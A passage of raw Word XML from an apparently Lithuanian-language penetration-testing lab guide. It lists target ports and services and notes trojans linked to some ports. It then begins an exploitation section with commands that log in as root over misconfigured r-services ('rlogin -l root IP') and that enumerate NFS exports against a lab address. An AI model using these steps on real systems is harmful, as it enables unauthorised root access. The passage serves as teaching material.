                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">Leidžiai </w:t>
            </w:r>
            <w:r w:rsidR="000F1FB8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>nutolusiems naudotojams prijungti direktoriją per tinklą</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F0450F" w:rsidRPr="00607DC0" w14:paraId="4DBA3602" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1C8946B4" w14:textId="6DC3EEED"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2121/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="596A2248" w14:textId="10B1E613" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00F0450F" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="57B21B84" w14:textId="38BE26E0" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00A623A6" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>ProFTPD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="66D67E5A" w14:textId="78CC109E" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00A623A6" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F6942">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>FTP paslauga</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A623A6" w:rsidRPr="00607DC0" w14:paraId="2A37F6D9" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6B4B080D" w14:textId="13D410A4"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3306/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3880B875" w14:textId="498F1DB9"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mysql</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3D314356" w14:textId="30558084"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MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="25F10420" w14:textId="60F4B5C3"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MySQL duomenų bazės paslauga</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A623A6" w:rsidRPr="00607DC0" w14:paraId="5139A37C" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2B4C8D3C" w14:textId="12741A40"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5432/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="32D2FDAE" w14:textId="0B1FCD23"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postgresql</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="635ACF9B" w14:textId="505D4AA1"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PostgreSQL Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2DDB4D85" w14:textId="2E23861D"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PostgreSQL duomenų bazės paslauga</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A623A6" w:rsidRPr="00607DC0" w14:paraId="2A90D82E" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="78B4BB07" w14:textId="5E0D80EB"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5900/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4877F813" w14:textId="4717A2F8"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vnc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3D74C68C" w14:textId="4774F7F0"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Remote Framebuffer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="43F1B3F0" w14:textId="64F728DA"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Nuotolinis darbalaukio valdymas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A623A6" w:rsidRPr="00607DC0" w14:paraId="00A218AA" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2616B6C5" w14:textId="70D3D7A3"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6000/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="506E5DA3" w14:textId="0A04765D"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X11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="350B074A" w14:textId="1E02ECD4"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X Window System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="032369E5" w14:textId="37DBAEE6"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Trojos arkliai, kurie gali būti vykdomi šiame prievade: The Thing, Aladino, NetBus, APStrojan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A623A6" w:rsidRPr="00607DC0" w14:paraId="07D0826E" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="659CD9B0" w14:textId="683D81DC"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lastRenderedPageBreak/>
              <w:t>6667/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4D582840" w14:textId="1AABB7FB"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irc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4A0D0DFE" w14:textId="0B81963A"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UnrealIRCd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="71DEB4F1" w14:textId="3172F876"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Šį prievadą naudoja daugelis trojos arklių: Dark Connection Inside, Dark FTP, Host Control ir kt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A623A6" w:rsidRPr="00607DC0" w14:paraId="04E93E48" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3402E069" w14:textId="48BDD09B"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8009/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6D67E619" w14:textId="34F89B88" w:rsidR="00A623A6" w:rsidRPr="00607DC0" w:rsidRDefault="00A623A6" w:rsidP="00A623A6">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>ajp13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="45F331A3" w14:textId="31EF17E8"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Apache Jserv</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1DC40B11" w14:textId="17FC6222" w:rsidR="00A623A6" w:rsidRPr="00607DC0" w:rsidRDefault="00A623A6" w:rsidP="00A623A6">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F6942">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Apache JServ Protocol 1.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53D0CD55" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BFAD4B8" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63C53AB7" w14:textId="383C3653" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Darbo eiga. Pažeidžiamumų išnaudojimas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="370212E7" w14:textId="77777777" w:rsidR="00BD6073" w:rsidRPr="00607DC0" w:rsidRDefault="00BD6073" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc258656090"/>
    </w:p>
    <w:p w14:paraId="206A66A2" w14:textId="370F2E9C" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Paslaugos: Unix pagrindai</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="2CF01AC3" w14:textId="03526CDF" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="123F7060" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP prieigos (port) 512, 513 ir 514 yra žinomos kaip "r" tipo paslaugos, kurie buvo nesukonfigūruoti, leisti nuotolinę prieigą iš bet kurio kompiuterio (standartas ". rhosts + +" situacija). Norėdami pasinaudoti šia klaida, įsitikinkite, kad "rsh-client" klientas yra įdiegtas (Ubuntu) ir paleiskite šią komandą, kaip lokalų root. Jei gavote pranešimą įvesti SSH raktą, tai reiškia, kad rsh-client įrankiai nebuvo įdiegti ir Ubuntu naudoja SSH pagal nutylėjimą. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C6DBEF" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35F0171F" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>rlogin -l root IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B3DC0C" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Sekanti paslauga į kurį turėtume atkreipti dėmesį tai, Tinklo rinkmenų sistemos (NFS). NFS gali būti identifikuojamas pagal prieigą (port) 2049 tiesiogiai arba užklausiant portmapper paslaugos. Toliau naudojant rpcinfo nustatyti NFS ir showmount -e nustatyti ar "/" prieigos dalį (failų sistemos šakninė direktorija) yra eksportuojama. Jums reikės rpcbind ir nfs-common Ubuntu paketų (įrankių).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C3BD84" w14:textId="77777777" w:rsidR="00607DC0" w:rsidRPr="00607DC0" w:rsidRDefault="00607DC0"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CC09C3" w:rsidRPr="00607DC0" w14:paraId="72A4C101" w14:textId="77777777" w:rsidTr="00CC09C3">
        <w:trPr>
          <w:trHeight w:val="368"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="668860EB" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3"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IP adresas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18FB1015" w14:textId="10DB3BF6" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00C77619"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CC09C3" w:rsidRPr="00607DC0" w14:paraId="78DD71AD" w14:textId="77777777" w:rsidTr="00CC09C3">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="358D393A" w14:textId="162D3F2B" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="006E1393" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1393">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>192.168.177.128</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6497" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="05D93546" w14:textId="462B9ADD" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="006E1393" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11E0F6A4" wp14:editId="7E62A9B2">
                  <wp:extent cx="4124325" cy="18357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325" cy="1835785"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D0F53E0" w14:textId="4715AE13" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25C3E080" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F9CBE73" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>rpcinfo -p IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B42F361" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>showmount -e IP</w:t>
      </w:r>
    </w:p>
